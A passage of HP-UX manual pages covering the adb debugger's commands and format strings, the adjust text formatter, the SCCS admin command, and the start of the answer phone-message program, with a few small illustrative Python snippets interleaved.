$register Register. The value of the register is obtained from the register set corresponding to
the current memory file. Register names are implementation dependent; see the r
command.
symbol A symbol is a sequence of uppercase or lowercase letters, underscores, or digits, not
starting with a digit. A backslash (\) can be used to escape other characters. The
value of the symbol is taken from the symbol table in the current object file.
variable A variable name consists of alphabets and numerals and always starts with $. Names
of registers in the target processor are reserved as variable names and can be used to
access registers in expressions.
In backward compatibility mode, a variable is a single numeral or alphabet except for
registers and the prefix letter is >.
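The radix prefixes above map onto standard number bases; as a quick illustrative check (Python, not adb):

```python
# adb's prefixes: 0/0o/0O -> octal, 0t/0d -> decimal, 0x/0X -> hexadecimal,
# 0b/0B -> binary. All four forms below denote the same value, sixteen.
assert int("20", 8) == 16       # 020, octal
assert int("16", 10) == 16      # 0t16 / 0d16, decimal
assert int("10", 16) == 16      # 0x10, hexadecimal
assert int("10000", 2) == 16    # 0b10000, binary
print("all radix forms equal sixteen")
```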
Commands
As mentioned above, adb commands may be specified in the traditional form or the keyword form.
In backward compatibility mode, only the traditional form is supported.
• Keyword commands
• Process commands
• Thread commands
• Shell commands
In backward compatibility mode:
• Variable commands
File commands
These commands operate on the current object file or the current memory file and are used to read, write,
etc.
file_selector [ modifier ] [ ,size | index ] [arglist ]
The file_selector can be one of these:
? The selected file is the current object file.
/ The selected file is the current memory file.
= This special symbol is only used for printing the value of dot.
The modifier specifies the operation on the file; modifier can be:
(no modifier)
It takes a single optional argument list which is a format string. adb prints data from
the selected file according to the format string. If a format string is not present and the
file selector is ? or / then adb uses the format string used by either of these earlier.
If the file selector is = and a format string is not present, then adb uses the format
string used by the previous = command.
/ [ , size ] value [ mask ]
Search the selected file. Words of size, size starting at dot are masked with mask and
compared with value until a match is found. If found, dot is set to that address of
masked object. If mask is omitted, no mask is used. dotincr is set to 0. Valid
values of size are 1, 2, 4, 8. If no size is specified then sizeof(int) is assumed.
value and mask are unsigned integers of size size bytes.
For example: expr?/,4 6 5. Search for the 4-byte value 6, masked with 5, in the current object
file, starting at expr.
= [ , size ] value1 value2 ...
Write a size sized value at the addressed location. dot is incremented by size after
each write. dotincr is set to 0. Values of size and values are same as for /
modifier. For this operation, the file should be opened with -w option.
For example: expr?=,4 6 5. Write 6 and 5 in the current object file at addresses expr
and expr+4, respectively.
> [ , index ] b e f
Set the index th mapping triple parameters of the selected file to the corresponding
argument values in order. Refer to Address Maps . If fewer than three arguments are
given, remaining maps remain unchanged. The arguments are expressions. If not
specified, index is assumed to be 0. For example: ?>,0 1 2 3 Set b, e, f (index 0)
of the current object file to 1, 2, 3 respectively.
In backward compatibility mode the following modifiers are also present.
* It has same behavior as that when no modifier is present. However, it uses the second
mapping triple to locate the file address of data to be printed.
l It has same behavior as modifier / with an implicit size of 2. It sets dotincr to 2.
L It has same behavior as modifier / with an implicit size of 4. It sets dotincr to 4.
w It has same behavior as modifier = with an implicit size of 2. It sets dotincr to 2. It
increments dot by the total size of all the values written minus dotincr.
W It has same behavior as modifier = with an implicit size of 4. It sets dotincr to 4.
dot is set as for w.
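The masked-search semantics of the / modifier above (words of a given size, masked and compared with a value) can be sketched in Python. This is an illustration only; the word alignment, little-endian byte order, and function name here are assumptions, not adb's actual behaviour:

```python
import struct

def masked_search(buf, start, size, value, mask):
    """Scan size-byte little-endian words from offset start, stepping one
    word at a time; return the offset of the first word w for which
    (w & mask) == value, or None if no word matches."""
    fmt = {1: "<B", 2: "<H", 4: "<I", 8: "<Q"}[size]
    for off in range(start, len(buf) - size + 1, size):
        (word,) = struct.unpack_from(fmt, buf, off)
        if (word & mask) == value:
            return off
    return None

data = bytes([0, 0, 0, 0, 6, 0, 0, 0])
print(masked_search(data, 0, 4, 6, 0xFFFFFFFF))
```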
Keyword Commands
Run the Keyword Command Form using the traditional command form by prefixing the command with $.
Please refer to Keyword Form Commands for the complete list of keyword commands.
Process Commands
These commands deal with managing subprocesses. adb can run an object file as a subprocess. Also, it
can adopt a subprocess given its pid. adb can debug multi-threaded and/or forked subprocesses. It can
also debug multiple subprocesses at the same time. However, at any time it focuses on one subprocess
and one of its threads called the current subprocess and current thread respectively.
The command consists of : followed by the modifier and an optional list of arguments. They are:
r [ objfile ] Run objfile as a subprocess. If address is given explicitly, the program is entered at
this point; otherwise the program is entered at its standard entry point. The value
count specifies how many breakpoints are ignored before stopping. arguments to the
subprocess may be supplied on the same line as the command. Semicolon is not used
as a command separator. An argument starting with < or > causes the standard input
or output to be established for the command. All signals are turned on when entering
the subprocess. Such a subprocess is referred to as a created subprocess.
If there are other created subprocesses running, all are killed. It does not kill any
attached subprocesses. This becomes the current subprocess.
e [ objfile ] Set up a subprocess as in :r; no instructions are executed.
a [ objfile ] Causes adb to adopt process with pid as a traced subprocess. If the objfile is specified,
adb uses it to lookup symbol information. Count has same meaning as in :r. Such a
subprocess is referred to as an attached subprocess. This subprocess becomes the
current subprocess.
k [ pid | * ]
Kills a created subprocess. If no argument is specified it kills the current subprocess.
If a pid is given, it kills the subprocess with that pid . If * is given, it kills all created
subprocesses.
The current subprocess is chosen from the remaining subprocesses.
de [ pid | * ]
The arguments can be a pid or a *. Same as :k, however it applies to attached sub-
processes. adb detaches from them.
c [ signal ] Continues the current subprocess with signal signal . It continues all the threads of the
subprocess. If no signal is specified, the signal that caused it to stop is sent. If address
is specified, the current thread continues at this address. Breakpoint skipping is the
same as for :r.
s [ signal | arg1 arg2 ... ]
Step the current thread count times. If address is given, then the thread continues at
that address , else from the address where it had stopped. If no signal is specified, the
signal that caused it to stop is sent. If there is no current subprocess, object file is run
as a subprocess as for :r. In this case no signal can be sent; the remainder of the line
is treated as arguments to the subprocess.
b [ command ]
Sets breakpoint at address in the current subprocess. The breakpoint is executed
count -1 times before causing a stop. Each time the breakpoint is encountered, the
command is executed. This breakpoint is a subprocess breakpoint. If any of the thread
executes the instruction at this address , it will stop. Multiple breakpoints can be set at
the same address .
d [ num | * ]
Deletes all breakpoints at address in the current subprocess, if it is specified. If * is
specified, it deletes all the current subprocess breakpoints. If num is specified, break-
point with number num is deleted.
en [ num | * ]
Enables all breakpoints at address in the current subprocess, if it is specified. If * is
specified, it enables all the current subprocess breakpoints. If num is specified, break-
point with number num is enabled.
di [ num | * ]
Disables all breakpoints at address in the current subprocess, if it is specified. If * is
specified, it disables all the current subprocess breakpoints. If num is specified, break-
point with number num is disabled.
z signum [ +s | -s | +r | -r | +d | -d ]
Changes signal handling for a specified signum for all the threads of the current sub-
process. Disposition can be specified as:
+s Stop subprocess when signum is received.
-s Do not stop subprocess when signum is received.
+r Report when signum is received.
-r Do not report when signum is received.
+d Deliver signum to the target subprocess .
-d Do not deliver signal to the target subprocess .
w [ pid ] Switches from the current subprocess to the subprocess with process ID pid . This pro-
cess becomes the current subprocess. This subprocess must be an already attached or
created subprocess. Both subprocesses are in stopped state after this command.
wc [ pid ] Same as w however the previous current subprocess is not stopped.
Thread Commands
These commands manage the threads in the current subprocess. The command consists of a ] followed
by a modifier and an optional argument list.
s [ signum ] Same as :s. However it is strictly for the current thread only.
c [ signum ] Same as :c. However it continues only the current thread. And count refers to the
breakpoint to skip for the current thread.
b [ command ] Same as :b. However it applies to the current thread only.
d [ num | * ] Same as :d. However it applies to current thread only.
en [ num | * ] Same as :en. However it applies to the current thread only.
di [ num | * ] Same as :di. However it applies to the current thread only.
z signum [ +s | -s | +r | -r | +d | -d ]
Same as :z. However it is meant for the current thread only. If a signum occurs in the
context of this thread this disposition value is used instead of that of the subprocess.
es [ signum ] Sets the flag for this signum for the current thread. It means that if this signal signum
occurs in the context of this thread, the thread’s signal disposition value is used instead of that of the
subprocess.
w [ pid ] Switch from the current thread to some other thread. Both the threads are in stopped
state after this, and the thread with threadid becomes the current thread. This com-
mand is also applicable to core file debugging. It switches from present thread to given
thread and makes the given thread as the current thread.
Shell Commands
This action consists of a ! character followed by a string . The string is passed unchanged to the shell
defined by the SHELL environment variable or to /bin/sh.
Variable Commands
This is supported in backward compatibility mode only. It consists of a > followed by a variable , var and
an optional value . This action assigns value to the variable or register named by var .
If not specified, value is assumed to be the value of dot. This behavior is deprecated.
n [ nodenumber ]
Without arguments print node information on a CCNUMA machine. With a
nodenumber argument, change to that node.
p traditional_cmd
This keyword command takes a traditional command as argument and interprets it.
a var value Assign value to adb variable var .
pa Virtual_Offset
Prints the physical address for a given Virtual Offset in HEX format. Space ID is
taken from the adb variable space. You can set the adb variable space using the key-
word command a explained earlier.
The following commands can run only in backward compatibility mode.
newline Print the process ID and register values.
M Toggle the address mapping of memfile between the initial map set up for a valid
memory file and the default mapping pair which the user can modify with the file
action modifier >. If the memory file was invalid, only the default mapping is avail-
able.
N [ nodenumber ]
Print the number of nodes on V-class multinode machines and the current node
number. To switch to another node, enter $N nodenumber.
F Print double precision floating point registers.
R Print all registers.
U Print unwind tables.
Format String
A format string is used to specify the formatting to be done before data is printed by adb. There are
two types of format strings supported by adb: traditional style and printf style. A traditional style
format string is a sequence of format specifiers. A printf-style format string is always preceded by a
comma (,) and enclosed within double quotes (""), and is a sequence of format specifiers and other char-
acters. Each format specifier should be preceded by a % character. Characters other than format
specifiers are printed as is. If needed, % should be escaped by %. It supports C language style \ charac-
ter escape sequences.
While processing a format string, adb scans the format string from left to right and applies each conver-
sion specifier encountered to the object addressed by the sum of dot and dotincr. After each
conversion specifier is processed, dotincr is incremented by count times size (implicit or explicit) of
that conversion specifier. If the format string is used to print the value of dot (using action =), dot
and dotincr remain unchanged. For the dot operator, dotincr is updated appropriately.
In backward compatibility mode, only the traditional style format string is supported.
Format Specifier
A format specifier can be a conversion specifier or a dot operator.
1. Conversion Specifier
Each conversion specifier consists of an optional count or pspec followed by an optional size specifier char-
acter , followed by a conversion specifier character .
count This is available only for the traditional style format string. The count specifies the number of
times this conversion specifier is to be repeated. If not specified, count is assumed to be 1.
pspec This is available only for the printf-style format string. It is a sequence of flags, fieldwidth and
precision as in the printf (3S) library function.
size specifier character
This specifies the size of object to which this is applied. Size can be specified in two ways. One is
using absolute size specifier and other is relative size specifier. Absolute size specifiers are as fol-
lows.
b The size of the object is 1 byte.
e The size of the object is 2 bytes.
g The size of the object is 4 bytes.
j The size of the object is 8 bytes.
k The size of the object is 16 bytes.
Relative size specifiers are as follows
w The size of the object is the size of a machine word of the target processor.
h The size of the object is half the size of a machine word of the target processor.
l The size of the object is double the size of a machine word of the target processor.
n The size of the object is the size of a pointer on the target processor. This will be different for
wide files and narrow files.
m The size of the object is the size of an instruction of the target processor. This will be sup-
ported only on processors where this is constant.
Conversion Specifier Character
The following characters are supported
a The value of dot is printed in symbolic form.
c The object is printed as a character.
o The object is printed as an unsigned octal number.
d The object is printed as a signed decimal number.
u The object is printed as an unsigned decimal number.
i The object is disassembled as an instruction and printed.
f The object is printed in a floating point format according to its size.
p The object is printed in symbolic form.
s The object is assumed to be a null terminated string and printed. This cannot be used to
print dot.
y The object is cast to type time_t and printed in the ctime (3C) format.
Here the printf-style format strings support only c, o, d, u, x, f, and s. If the size specifier
character is not specified, it is assumed to be b for conversion character c; w for conversion char-
acters d, u, x, o, and f; m for i; sizeof(time_t) for y; and w for everything else.
For example: 10=2bo, ’abc’=,"%s", main?4i
2. Dot Operator
A dot operator consists of an optional count , optional size specifier character , and a dot operator charac-
ter .
count count specifies the number of times this dot operator is to be repeated. If not specified, count
is assumed to be 1. The count is always 1 for printf-style format strings.
Size Specifier Character
Same as size specifier character of conversion specifier.
Dot operator character
This can be one of these
v Increment dotincr by count times size.
Address Maps
In files like object files and application core files, the virtual memory address is not the same as the
file offset. So adb keeps an array of address maps for these files to map a given virtual memory address
to a file offset. Each address map is a triple: start virtual address (b), end virtual address (e) and start
file offset (f). The triple specifies that all addresses from b to e - 1 occupy a contiguous region in the file
starting at f. Given a virtual address a such that b <= a < e, the file offset of a can be computed as f + a - b.
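The offset rule above can be sketched directly; this is an illustration of the mapping triples only, not adb's internal data structure:

```python
def file_offset(addr, maps):
    """Translate virtual address addr to a file offset using (b, e, f)
    triples: for b <= addr < e the offset is f + addr - b.
    Returns None when no triple covers addr."""
    for b, e, f in maps:
        if b <= addr < e:
            return f + addr - b
    return None

maps = [(0x1000, 0x2000, 0x400)]
print(hex(file_offset(0x1800, maps)))  # 0x400 + 0x1800 - 0x1000 = 0xc00
```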
State variables
There are several variables which define the state of adb at any instant in time. They are:
dot Current address. Initial value is 0.
dotincr Current address increment. Initial value is 0.
prompt Prompt string used by adb. Initial value is ‘‘adb> ’’.
radix The current input radix. Initial value is as in the assembly language of the target proces-
sor.
maxwidth The maximum width of the display. Initial value is 80.
maxoffset If an address is within this limit from a known symbol, adb prints the address as
symbol_name +offset , else the address is printed. Initial value is 0xffffffff.
macropath List of directories to be searched for adb macros. Initial value is .:/usr/lib/adb.
pager Pager command used by adb. Initial value is more -c.
backcompat Set to 1 if adb is in backward compatibility mode. Initial value depends on the host pro-
cessor.
Note
adb64 is a symbolic link to adb. This symbolic link is maintained for backward compatibility with some
old scripts which may be using adb64.
EXTERNAL INFLUENCES
International Code Set Support
Single- and multi-byte character code sets are supported.
RETURN VALUE
adb comments about inaccessible files, syntax errors, abnormal termination of commands, etc. Exit
status is 0 unless the last command failed or returned non-zero status.
AUTHOR
adb was developed by HP.
FILES
a.out
core
/dev/mem
/dev/kmem
SEE ALSO
ttrace(2), crt0(3), ctime(3C), end(3C), a.out(4), core(4), signal(5).
ADB Tutorial
NAME
adjust - simple text formatter
SYNOPSIS
adjust [-b] [-c|-j|-r ] [-m column ] [-t tabsize ] [ files ... ]
DESCRIPTION
The adjust command is a simple text formatter for filling, centering, left and right justifying, or only
right justifying text paragraphs, and is designed for interactive use. It reads the concatenation of input
files (or standard input if none are given) and produces on standard output a formatted version of its
input, with each paragraph formatted separately. If - is given as an input filename, adjust reads
standard input at that point (use -- as an argument to separate - from options).
adjust reads text from input lines as a series of words separated by space characters, tabs, or newlines.
Text lines are grouped into paragraphs separated by blank lines. By default, text is copied directly to the
output, subject only to simple filling (see below) with a right margin of 72, and leading spaces are con-
verted to tabs where possible.
Options
The adjust command recognizes the following command-line options:
-b Do not convert leading space characters to tabs on output; (output contains no tabs, even
if there were tabs in input).
-c Center text on each line. Lines are pre- and post-processed, but no filling is performed.
-j Justify text. After filling, insert spaces in each line as needed to right justify it (except in
the last line of each paragraph) while keeping the justified left margin.
-r After filling text, adjust the indentation of each line for a smooth right margin (ragged
left margin).
-mcolumn
Set the right fill margin to the given column number, instead of 72. Text is filled, and
optionally right justified, so that no output line extends beyond this column (if possible).
If -m0 is given, the current right margin of the first line of each paragraph is used for
that and all subsequent lines in the paragraph.
By default, text is centered on column 40. With -c, the -m option sets the middle column
of the centering ‘‘window’’, but -m0 auto-sets the right side as before (which then deter-
mines the center of the ‘‘window’’).
-ttabsize Set the tab size to other than the default (eight columns).
Only one of the -c, -j, and -r options is allowed in a single command line.
Details
Before doing anything else to a line of input text, adjust first handles backspaces, rubbing out preced-
ing characters in the usual way. Next, it ignores all non-printable characters except tab. It then expands
all tabs to spaces.
For simple text filling, the first word of the first line of each paragraph is indented the same amount as in
the input line. Each word is then carried to the output followed by one space. ‘‘Words’’ ending in
terminal_character[quote ][closing_character] are followed by two spaces, where terminal_character is
any of ., :, ?, or !; quote is a single closing quote ( ’ ) character or a double-quote character ( " ), and
closing_character is any of ), ], or }. Here are some examples:
end. of? sentence.’ sorts!" of.) words?"]
(adjust does not place two spaces after a pair of single closing quotes ( ’’ ) following a
terminal_character).
adjust starts a new output line whenever adding a word (other than the first one) to the current line
would exceed the right margin.
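A minimal sketch of the filling rules above (greedy word placement, with two spaces after sentence-ending "words"); it ignores adjust's tab expansion, paragraph indentation, and kinsoku processing, and the function names are our own:

```python
import re

# Matches a word ending in . : ? or !, optionally followed by a closing
# quote and/or a closing bracket -- the "followed by two spaces" rule.
SENTENCE_END = re.compile(r'[.:?!][\'"]?[)\]}]?$')

def fill(words, margin=72):
    """Greedy fill: start a new line whenever adding the next word
    (plus its separator) would exceed the right margin."""
    lines, line = [], ""
    for w in words:
        sep = "" if not line else ("  " if SENTENCE_END.search(line) else " ")
        if line and len(line) + len(sep) + len(w) > margin:
            lines.append(line)
            line = w
        else:
            line = line + sep + w
    if line:
        lines.append(line)
    return lines
```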
adjust understands indented first lines of paragraphs (such as this one) when filling. The
second and subsequent lines of each paragraph are indented the same amount as the second line of the
input paragraph if there is a second line, else the same as the first line.
adjust(1) adjust(1)
* adjust also has a rudimentary understanding of tagged paragraphs (such as this one) when
filling. If the second line of a paragraph is indented more than the first, and the first line has
a word beginning at the same indentation as the second line, the input column position of the
tag word or words (prior to the one matching the second line indentation) is preserved.
Tag words are passed through without change of column position, even if they extend beyond the right
margin. The rest of the line is filled or right justified from the position of the first non-tag word.
When -j is given, adjust uses an intelligent algorithm to insert spaces in output lines where they are
most needed, until the lines extend to the right margin. First, all one space word separators are exam-
ined. One space is added to each separator, starting with the one having the most letters between it and
the preceding and following separators, until the modified line reaches the right margin. If all one space
separators are increased to two spaces and more spaces must be inserted, the algorithm is repeated with
two space separators, and so on.
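The space-insertion pass can be approximated as follows. This is a simplified reading of the algorithm described above, not adjust's exact implementation, and it ignores two-space sentence separators:

```python
def justify(words, margin):
    """Right-justify a filled line by widening inter-word gaps, one
    column at a time, separators with the most neighbouring letters
    first (a simplified reading of the adjust -j algorithm)."""
    if len(words) < 2:
        return " ".join(words)
    gaps = [1] * (len(words) - 1)
    total = sum(len(w) for w in words) + sum(gaps)
    width = 1
    while total < margin:
        # separators currently `width` columns wide, widest neighbours first
        cand = sorted((i for i in range(len(gaps)) if gaps[i] == width),
                      key=lambda i: len(words[i]) + len(words[i + 1]),
                      reverse=True)
        for i in cand:
            if total >= margin:
                break
            gaps[i] += 1
            total += 1
        width += 1
    return words[0] + "".join(" " * g + w for g, w in zip(gaps, words[1:]))
```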
Output line indentation is held to one less than the right margin. If a single word is larger than the line
size (right margin minus indentation), that word appears on a line by itself, properly indented, and
extends beyond the right margin. However, if -r is used, such words are still right justified, if possible.
If the current locale defines class names ekinsoku and bkinsoku (see iswctype (3C)), adjust formats
the text in accordance with the ekinsoku/bkinsoku character classification and margin settings (see
-r, -j, and -m options).
EXTERNAL INFLUENCES
Environment Variables
LANG provides a default value for the internationalization variables that are unset or null. If LANG is
unset or null, the default value of "C" (see lang (5)) is used. If any of the internationalization variables
contains an invalid setting, adjust behaves as if all internationalization variables are set to "C" (see
environ (5)). NLSPATH determines the location of the message catalog for the processing of LC_MESSAGES.
DIAGNOSTICS
adjust complains to standard error and later returns a nonzero value if any input file cannot be opened
(it skips the file). It does the same (but quits immediately) if the argument to -m or -t is out of range, or
if the program is improperly invoked.
Input lines longer than BUFSIZ are silently split (before tab expansion) or truncated (afterwards). Lines
that are too wide to center begin in column 1 (no leading spaces).
EXAMPLES
This command is useful for filtering text while in vi (1). For example,
!}adjust
reformats the rest of the current paragraph (from the current line down), evening the lines.
The vi command:
:map ˆX {!}adjust -jˆVˆM
(where ˆ denotes control characters) sets up a useful ‘‘finger macro’’. Typing ˆX (Ctrl-X) reformats the
entire current paragraph.
adjust -m1 is a simple way to break text into separate words without white space, except for tagged-
paragraph tags.
WARNINGS
This program is designed to be simple and fast. It does not recognize backslash to escape white space or
other characters. It does not recognize tagged paragraphs where the tag is on a line by itself. It knows
that lines end in newline or null, and how to deal with tabs and backspaces, but it does not do anything
special with other characters such as form feed (they are simply ignored). For complex operations, stan-
dard text processors are likely to be more appropriate.
This program could be implemented instead as a set of independent programs, fill, center, and justify
(with the -r option). However, this would be much less efficient in actual use, especially given the
program’s special knowledge of tagged paragraphs and last lines of paragraphs.
AUTHOR
adjust was developed by HP.
SEE ALSO
nroff(1).
admin(1) admin(1)
NAME
admin - create and administer SCCS files
SYNOPSIS
admin -i[name] [-n] [-b] [-a login ] ... [-d flag[flag-val ] ] ... [-f flag[flag-val ] ] ...
[-m mrlist ] ... [-r rel ] [-t[name] ] [-y[comment ] ] file ...
admin -n [-a login ] ... [-d flag[flag-val ] ] ... [-f flag[flag-val ] ] ... [-m mrlist ] ...
[-t[name] ] [-y[comment ] ] file ...
admin [-a login ] ... [-e login ] ... [-d flag[flag-val ] ] ... [-m mrlist ] ...
[-r rel ] [-t[name] ] file ...
admin -h file ...
admin -z file ...
DESCRIPTION
The admin command is used to create new SCCS files and change the parameters of existing ones. Argu-
ments to admin, which may appear in any order (unless -- is specified as an argument, in which case
all arguments after -- are treated as files), consist of option arguments, beginning with -, and named
file s (note that SCCS file names must begin with the characters s.). If a named file does not exist, it is
created and its parameters are initialized according to the specified option arguments. Parameters not
initialized by an option argument are assigned a default value. If a named file does exist, parameters
corresponding to specified option arguments are changed, and other parameters are left unaltered.
If directory is named instead of file , admin acts on each file in directory , except that non-SCCS files (the
last component of the path name does not begin with s.) and unreadable files are silently ignored. If a
name of - is given, the standard input is read, and each line of the standard input is assumed to be the
name of an SCCS file to be processed. Again, non-SCCS files and unreadable files are silently ignored.
The admin option arguments apply independently to all named file s, whether one file or many. In the
following discussion, each option is explained as if only one file is specified, although they affect single or
multiple files identically.
Options
The admin command supports the following options and command-line arguments:
-n This option indicates that a new SCCS file is to be created.
-i[name] The name of a file from which the contents for a new SCCS file is to be taken (if
name is a binary file, you must specify the -b option). The contents constitute
the first delta of the file (see the -r option for the delta numbering scheme). If the
-i option is used but the file name is omitted, the text is obtained by reading the
standard input until an end-of-file is encountered. If this option is omitted, the
SCCS file is created with an empty initial delta. Only one SCCS file can be created
by an admin command on which the -i option is supplied. Using a single admin
to create two or more SCCS files requires that they be created empty (no -i option).
Note that the -i option implies the -n option.
-b Encode the contents of name, specified to the -i option. This keyletter must be used
if name is a binary file; otherwise, a binary file will not be handled properly by
SCCS commands.
-r rel The release (rel ) into which the initial delta is inserted. This option can be used
only if the -i option is also used. If the -r option is not used, the initial delta is
inserted into release 1. The level of the initial delta is always 1 (by default initial
deltas are named 1.1).
-t[name] The name of a file from which descriptive text for the SCCS file is to be taken. If
the -t option is used and admin is creating a new SCCS file (the -n and/or -i
options are also used), the descriptive text file name must also be supplied. In the
case of existing SCCS files:
• A -t option without a file name causes removal of descriptive text (if any)
currently in the SCCS file.
• A -t option with a file name causes text (if any) in the named file to
replace the descriptive text (if any) currently in the SCCS file.
-f flag This option specifies a flag, and possibly a value for the flag, to be placed in the
SCCS file. Several -f options can be supplied on a single admin command line.
The allowable flags and their values are:
b Allows use of the -b option on a get command (see get (1)) to
create branch deltas.
cceil The highest release (i.e., "ceiling"), a number less than or equal to
9999, which can be retrieved by a get command for editing. The
default value for an unspecified c flag is 9999.
ffloor The lowest release (i.e., "floor"), a number greater than 0 but less
than 9999, which may be retrieved by a get command for editing.
The default value for an unspecified f flag is 1.
dSID The default delta number SID to be used by a get command (see
get (1)).
istr Causes the message:
No id keywords (cm7)
issued by get or delta to be treated as a fatal error (see delta (1)).
In the absence of this flag, the message is only a warning. The mes-
sage is issued if no SCCS identification keywords (see get (1)) are
found in the text retrieved or stored in the SCCS file. If a value is
supplied, the keywords must exactly match the given string. How-
ever, the string must contain a keyword, but must not contain
embedded newlines.
j Allows concurrent get commands for editing on the same SID of an
SCCS file. This allows multiple concurrent updates to the same
version of the SCCS file.
Only one user can perform concurrent edits. Access by multiple
users is usually accomplished by using a common login or a set user
ID program (see chmod(1) and exec (2)).
llist A list of releases to which deltas can no longer be made. (A get
-e against one of these locked releases fails). The list has the fol-
lowing syntax:
list ::= range | list , range
range ::= RELEASE NUMBER | a
The character a in the list is equivalent to specifying all releases
for the named SCCS file. Omitting any list is equivalent to a.
n Causes delta to create a null delta in each of those releases being
skipped (if any) when a delta is made in a new release (such as
when making delta 5.1 after delta 2.7, release 3 and release 4 are
skipped). These null deltas serve as anchor points so that branch
deltas can be created from them later. The absence of this flag
causes skipped releases to be nonexistent in the SCCS file, prevent-
ing branch deltas from being created from them in the future.
qtext User-definable text substituted for all occurrences of the %Q% key-
word in SCCS file text retrieved by get.
mmod The module name of the SCCS file substituted for all occurrences of
the %M% keyword in SCCS file text retrieved by get. If the m flag is
not specified, the value assigned is the name of the SCCS file with
the leading s. removed.
ttype The type of module in the SCCS file substituted for all occurrences
of %Y% keyword in SCCS file text retrieved by get.
-d flag Causes removal (deletion) of the specified flag from an SCCS file. The -d
option can be specified only when processing existing SCCS files. Several -d
options can be supplied on a single admin command line. See the -f option
for allowable flag names.
llist A list of releases to be unlocked. See the -f option for a descrip-
tion of the l flag and the syntax of a list .
-a login A login name, or numerical HP-UX group ID, to be added to the list of users
allowed to make deltas (changes) to the SCCS file. A group ID is equivalent to
specifying all login names common to that group ID. Several a options can be used
on a single admin command line. As many login s or numerical group IDs as
desired can be on the list simultaneously. If the list of users is empty, anyone can
add deltas. A login or group ID preceded by a ! denies permission to make deltas.
-e login A login name or numerical group ID to be erased from the list of users allowed to
make deltas (changes) to the SCCS file. Specifying a group ID is equivalent to
specifying all login names common to that group ID. Several e options can be used
on a single admin command line.
-y[comment] The comment text is inserted into the SCCS file as a comment for the initial delta in
a manner identical to that of delta (1). Omission of the -y option results in a
default comment line being inserted in the form:
date and time created YY/MM/DD HH:MM:SS by login
The -y option is valid only if the -i and/or -n options are specified (i.e., a new
SCCS file is being created).
-m mrlist The list of Modification Request (MR) numbers is inserted into the SCCS file as the
reason for creating the initial delta, in a manner identical to delta (1). The v flag
must be set and the (MR) numbers are validated if the v flag has a value (the name
of an (MR) number validation program). Diagnostic messages occur if the v flag is
not set or (MR) validation fails.
-h Causes admin to check the structure of the SCCS file (see sccsfile (4)), and to com-
pare a newly computed checksum (the sum of all of the characters in the SCCS file
except those in the first line) with the checksum that is stored in the first line of the
SCCS file. Appropriate error diagnostics are produced.
This option inhibits writing on the file, thus canceling the effect of any other options
supplied, and therefore is only meaningful when processing existing files.
-z The SCCS file checksum is recomputed and stored in the first line of the SCCS file
(see -h, above).
Note that use of this option on a truly corrupted file can prevent future detection of
the corruption.
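The checksum rule used by -h and -z (the sum of all of the characters in the file except those in the first line) can be sketched as below; the 16-bit mask and the sample file are assumptions for illustration, not taken from sccsfile(4).

```python
def sccs_checksum(text):
    """Sum of the character values of everything after the first line,
    masked to 16 bits (the classic SCCS checksum width -- an assumption)."""
    body = text.split("\n", 1)[1] if "\n" in text else ""
    return sum(body.encode("ascii")) & 0xFFFF

# Hypothetical miniature SCCS-like file: the first line is excluded.
sample = "\x01h12345\n\x01s 00001/00000/00000\nhello\n"
```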
EXTERNAL INFLUENCES
Environment Variables
LC_CTYPE determines the interpretation of text as single- and/or multi-byte characters.
LC_MESSAGES determines the language in which messages are displayed.
If any internationalization variable contains an invalid setting, admin behaves as if all
internationalization variables are set to C. See environ (5).
DIAGNOSTICS
Use sccshelp (1) for explanations.
WARNINGS
SCCS files can be any length, but the number of lines in the text file itself cannot exceed 99 999 lines.
FILES
The last component of all SCCS file names must be of the form s.filename. New SCCS files are given
mode 444 (see chmod(1)). Write permission in the pertinent directory is required to create a file. All
writing done by admin is to a temporary x-file, called x.filename (see get (1)), created with mode 444 if
the admin command is creating a new SCCS file, or with the same mode as the SCCS file if it exists.
After successful execution of admin, the SCCS file is removed (if it exists), and the x-file is renamed to
the name of the SCCS file. This ensures that changes are made to the SCCS file only if no errors
occurred.
It is recommended that directories containing SCCS files be mode 755 and that SCCS files themselves be
mode 444. The mode of any given directory allows only the owner to modify SCCS files contained in that
directory. The mode of the SCCS files prevents any modification at all except by SCCS commands.
If it should be necessary to patch an SCCS file for any reason, the mode can be changed to 644 by the
owner, thus allowing the use of vi or any other suitable editor. Care must be taken! The edited file
should always be processed by an admin -h to check for corruption followed by an admin -z to gen-
erate a proper checksum. Another admin -h is recommended to ensure the SCCS file is valid.
admin also makes use of a transient lock file called z.filename, which is used to prevent simultaneous
updates to the SCCS file by different users. See get (1) for further information.
SEE ALSO
delta(1), ed(1), get(1), sccshelp(1), prs(1), what(1), sccsfile(4), acl(5).
STANDARDS CONFORMANCE
admin: SVID2, SVID3, XPG2, XPG3, XPG4
answer(1) answer(1)
NAME
answer - phone message transcription system
SYNOPSIS
answer [-pu]
DESCRIPTION
The answer interactive program helps you to transcribe telephone (and other) messages into electronic
mail.
The program uses your personal elm alias database and the system elm alias database, allowing you to
use aliases to address the messages.
Options
answer supports the following options:
-p Prompt for phone-slip-type message fields.
-u Allow addresses that are not aliases.
Operation
answer begins with the Message to: prompt. Enter a one-word alias or a two-word user name
("words" are separated by spaces). The user name is converted to an alias in the form f_lastword, where
f is the first character of the first word, lastword is the second word, and all letters are shifted to lower-
case. For example, Dave Smith is converted to the alias d_smith.
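The name-to-alias conversion can be sketched as follows (the function name is ours, not part of answer):

```python
def to_alias(entry):
    """Convert a 'First Last' name to the f_lastword alias form described
    above; a single word is assumed to already be an alias."""
    words = entry.split()
    if len(words) == 1:
        return words[0]
    # first initial + '_' + second word, all shifted to lowercase
    return (words[0][0] + "_" + words[1]).lower()
```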
Without the -u option, the specified or converted alias must exist in the alias databases. With the -u
option, if the processed "alias" is not in the alias databases, it is used for the address as is.
The fully expanded address is displayed.
With the -p option, you are asked for typical message slip data:
Caller:
of:
Phone:
TELEPHONED -
CALLED TO SEE YOU -
WANTS TO SEE YOU -
RETURNED YOUR CALL -
PLEASE CALL -
WILL CALL AGAIN -
*****URGENT****** -
Enter the appropriate data. You can put just an X or nothing after the pertinent dash prompts, or you
can type longer comments. Whatever you enter becomes part of the message. Lines with no added text
are omitted from the message.
Finally, you are prompted for a message. Enter a message, if any, ending with a blank line. The mes-
sage is sent and the Message to: prompt is repeated.
To end the program, enter any one of bye, done, exit, or quit, at the Message to: prompt.
EXAMPLES
User input is in normal type.
With No Options
This example shows a valid alias, an invalid user name, and a valid user name. In the invalid case, the
converted alias is displayed in square brackets.
TELEPHONED - at 4:30pm
CALLED TO SEE YOU -
WANTS TO SEE YOU - X
RETURNED YOUR CALL -
PLEASE CALL - X
